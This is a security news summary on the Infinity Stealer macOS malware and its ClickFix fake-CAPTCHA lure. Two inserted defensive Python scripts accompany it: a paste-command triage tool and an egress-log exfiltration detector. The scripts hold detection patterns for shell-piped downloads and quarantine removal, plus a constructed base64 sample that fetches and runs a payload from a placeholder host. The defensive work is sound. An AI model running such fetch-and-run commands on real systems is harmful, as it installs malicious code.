Category: Malware & Ransomware | Severity: HIGH

Infinity Stealer - New Malware Targets macOS Users

Source: BleepingComputer (+1 more)
Tags: Infinity Stealer, macOS, Nuitka, ClickFix, info stealer

Basically, a new malware tricks macOS users into running harmful code to steal their data.

Quick Summary

Infinity Stealer malware is targeting macOS users through deceptive ClickFix lures. This malware steals sensitive data, posing a serious risk. Users must be cautious about executing unknown commands.

What Happened

A new malware named Infinity Stealer has emerged, specifically targeting macOS systems. This info-stealing malware employs a unique delivery method known as ClickFix, which mimics a Cloudflare human verification check. Users are tricked into executing malicious code by completing a fake CAPTCHA challenge. The malware is packaged as a Python executable using the Nuitka compiler, making it more difficult to analyze and detect.

Researchers at Malwarebytes have identified this as the first documented macOS campaign that combines ClickFix delivery with a Python-based infostealer. Compiling with Nuitka turns the Python source into a native binary, which resists static analysis far better than a plain Python script would. This makes reverse engineering the malware significantly harder for security professionals.

Who's Being Targeted

The primary targets of Infinity Stealer are macOS users, particularly those who may not be aware of the risks associated with executing commands found online. The attack begins with a lure on the domain update-check[.]com, where users are misled into pasting a base64-obfuscated command into their macOS Terminal. This command bypasses OS-level defenses, allowing the malware to be installed without the user's knowledge.

Once the malware is installed, it can perform various malicious activities, including stealing sensitive data from the user’s system. The malware checks for certain conditions to ensure it is not running in a virtualized or sandboxed environment, further complicating detection efforts.
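The delivery step described above hinges on a user pasting a base64-obfuscated command into Terminal without reading it. The following triage helper is an added example (not code from the page, BleepingComputer or Malwarebytes) that a defender or help desk can run over a command a user was asked to paste: it decodes embedded base64 fragments and flags constructs that a genuine "human verification" step would never need, such as piping decoded data or a remote download into a shell, or removing the macOS quarantine attribute. The pattern list, weights and sample commands are constructed assumptions for illustration, not published indicators of this campaign.

```python
"""Triage helper for ClickFix-style Terminal commands (added example, not the page's code).

Heuristic patterns and risk weights below are illustrative assumptions.
"""
import base64
import binascii
import re

# Tokens that look like base64: long runs of the base64 alphabet with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructs a legitimate verification step never needs (assumed, illustrative list).
SUSPICIOUS_PATTERNS = {
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"),
    "remote_fetch_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "quarantine_removal": re.compile(r"xattr\s+(-\w+\s+)*com\.apple\.quarantine"),
    "python_oneliner_exec": re.compile(r"\bpython3?\s+-c\b"),
    "eval_of_data": re.compile(r"\beval\b"),
}
# Findings that on their own justify a "high" verdict.
EXECUTION_FINDINGS = ("base64_decode_to_shell", "remote_fetch_to_shell", "quarantine_removal")


def decode_base64_fragments(command: str) -> list:
    """Return the printable UTF-8 decodings of every base64-looking token in the command."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not real base64, or random bytes: ignore
        # Random bytes almost never decode to all-printable text; a nested command does.
        if text and all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def assess_command(command: str, depth: int = 0) -> dict:
    """Score a pasted command; returns {"risk", "findings", "decoded"}."""
    findings = [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(command)]
    decoded = decode_base64_fragments(command)
    # The decoded text is usually itself a shell command, so assess it too (two levels max).
    if depth < 2:
        for inner in list(decoded):
            nested = assess_command(inner, depth + 1)
            findings.extend("decoded:" + f for f in nested["findings"])
            decoded.extend(nested["decoded"])
    findings = sorted(set(findings))
    if any(f.endswith(EXECUTION_FINDINGS) for f in findings):
        risk = "high"
    elif findings or decoded:
        risk = "medium"
    else:
        risk = "low"
    return {"risk": risk, "findings": findings, "decoded": decoded}


# Constructed sample commands. example.invalid is a reserved placeholder, not a real host.
_INNER = b"curl -fsSL http://example.invalid/payload | sh"
SAMPLE_COMMANDS = {
    "benign": "brew update && brew upgrade",
    "clickfix_base64": 'echo "%s" | base64 -d | sh' % base64.b64encode(_INNER).decode(),
    "quarantine_strip": "xattr -d com.apple.quarantine Installer.app && open Installer.app",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        verdict = assess_command(cmd)
        print(f"{name:17} risk={verdict['risk']:6} findings={verdict['findings']}")
        for text in verdict["decoded"]:
            print(f"{'':17} decoded payload: {text}")
```

The decoded payload is printed rather than executed; the point of the check is to show the user what the "verification" command actually does before anything runs.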

Signs of Infection

Once the Infinity Stealer malware is active, it can collect a range of sensitive information. This includes:

  • Credentials from Chromium-based browsers and Firefox
  • macOS Keychain entries
  • Cryptocurrency wallets
  • Plaintext secrets in developer files

The stolen data is exfiltrated via HTTP POST requests to a command-and-control server. Additionally, the threat actors receive notifications through Telegram once the data is successfully collected. Users may notice unusual activity or performance issues on their devices, but many may remain unaware of the infection.
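Because the page says the stolen data leaves the machine as HTTP POST requests to a command-and-control server, egress logs are one place a defender can look. The script below is an added example (not from the page or the cited articles) that runs a simple heuristic over constructed egress-proxy log lines: POST traffic to destinations outside an allowlist is scored on three signals, a raw-IP destination, a non-browser user agent, and cumulative upload volume, and a (host, process, destination) triple that shows at least two signals is reported. The log format, allowlist, thresholds, process names and the "python-requests" user agent are all assumptions made for the example; the page does not state what user agent the stealer uses.

```python
"""Heuristic exfiltration detector over constructed egress-proxy log lines
(added example, not the page's code).  Log format, allowlist, threshold and
sample lines are constructed for illustration."""
import re
from collections import defaultdict

# Constructed log format: ts host=... proc=... method=... dst=... bytes_out=... ua="..."
LINE_RE = re.compile(
    r'(?P<ts>\S+)\s+host=(?P<host>\S+)\s+proc=(?P<proc>\S+)\s+method=(?P<method>\S+)'
    r'\s+dst=(?P<dst>\S+)\s+bytes_out=(?P<bytes>\d+)\s+ua="(?P<ua>[^"]*)"'
)
ALLOWED_DESTINATIONS = {"www.apple.com", "accounts.example.com", "slack.com"}  # assumed
UPLOAD_THRESHOLD = 64 * 1024  # bytes per (host, process, destination); assumed
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = int(rec["bytes"])
    return rec


def detect_exfiltration(lines) -> list:
    """Return one alert per (host, proc, dst) whose non-allowlisted POST traffic shows >= 2 signals."""
    totals = defaultdict(int)
    user_agents = defaultdict(set)
    first_seen = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["dst"] in ALLOWED_DESTINATIONS:
            continue
        key = (rec["host"], rec["proc"], rec["dst"])
        totals[key] += rec["bytes"]
        user_agents[key].add(rec["ua"])
        first_seen.setdefault(key, rec["ts"])

    alerts = []
    for key, total in totals.items():
        host, proc, dst = key
        reasons = []
        if IPV4_RE.match(dst):
            reasons.append("raw IP destination")
        if not any(ua.startswith("Mozilla/") for ua in user_agents[key]):
            reasons.append("non-browser user agent: " + ", ".join(sorted(user_agents[key])))
        if total >= UPLOAD_THRESHOLD:
            reasons.append(f"{total} bytes uploaded")
        if len(reasons) >= 2:
            alerts.append({"first_seen": first_seen[key], "host": host, "proc": proc,
                           "dst": dst, "bytes_out": total, "reasons": reasons})
    return alerts


# Constructed sample lines. 198.51.100.23 is a documentation address, not a real C2.
LOG_LINES = """\
2024-05-01T10:00:01Z host=mac-01 proc=Safari method=GET dst=www.apple.com bytes_out=410 ua="Mozilla/5.0 (Macintosh)"
2024-05-01T10:00:05Z host=mac-01 proc=Safari method=POST dst=accounts.example.com bytes_out=2048 ua="Mozilla/5.0 (Macintosh)"
2024-05-01T10:01:12Z host=mac-01 proc=verify method=POST dst=198.51.100.23 bytes_out=184320 ua="python-requests/2.31"
2024-05-01T10:01:14Z host=mac-01 proc=verify method=POST dst=198.51.100.23 bytes_out=96000 ua="python-requests/2.31"
2024-05-01T10:02:00Z host=mac-02 proc=Slack method=POST dst=slack.com bytes_out=1200 ua="Slack/4.3"
"""

if __name__ == "__main__":
    for alert in detect_exfiltration(LOG_LINES.splitlines()):
        print(f"{alert['first_seen']} {alert['host']} {alert['proc']} -> {alert['dst']}: "
              + "; ".join(alert["reasons"]))
```

Scoring on the combination of signals rather than any single one keeps ordinary uploads (a browser posting a form, a chat client syncing) out of the alert list while still catching a non-browser process pushing a large volume to an unfamiliar address.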

How to Protect Yourself

To defend against threats like Infinity Stealer, users should exercise caution when executing commands found online. It is crucial to avoid pasting commands into the Terminal unless they are fully understood. Here are some recommended actions:

  • Use reputable antivirus software to detect and remove malware.
  • Regularly update macOS and applications to patch vulnerabilities.
  • Educate yourself about phishing techniques and the importance of verifying sources before executing commands.
  • Back up important data regularly to mitigate the impact of potential data loss.

The emergence of Infinity Stealer highlights an evolving threat landscape for macOS users, emphasizing the need for heightened awareness and proactive security measures.

🔒 Pro insight: The combination of ClickFix and Nuitka in this campaign signifies a shift towards more sophisticated macOS threats, complicating detection and response efforts.

Original article from BleepingComputer · Bill Toulas

Also covered by BleepingComputer: "New Infinity Stealer malware grabs macOS data via ClickFix lures"
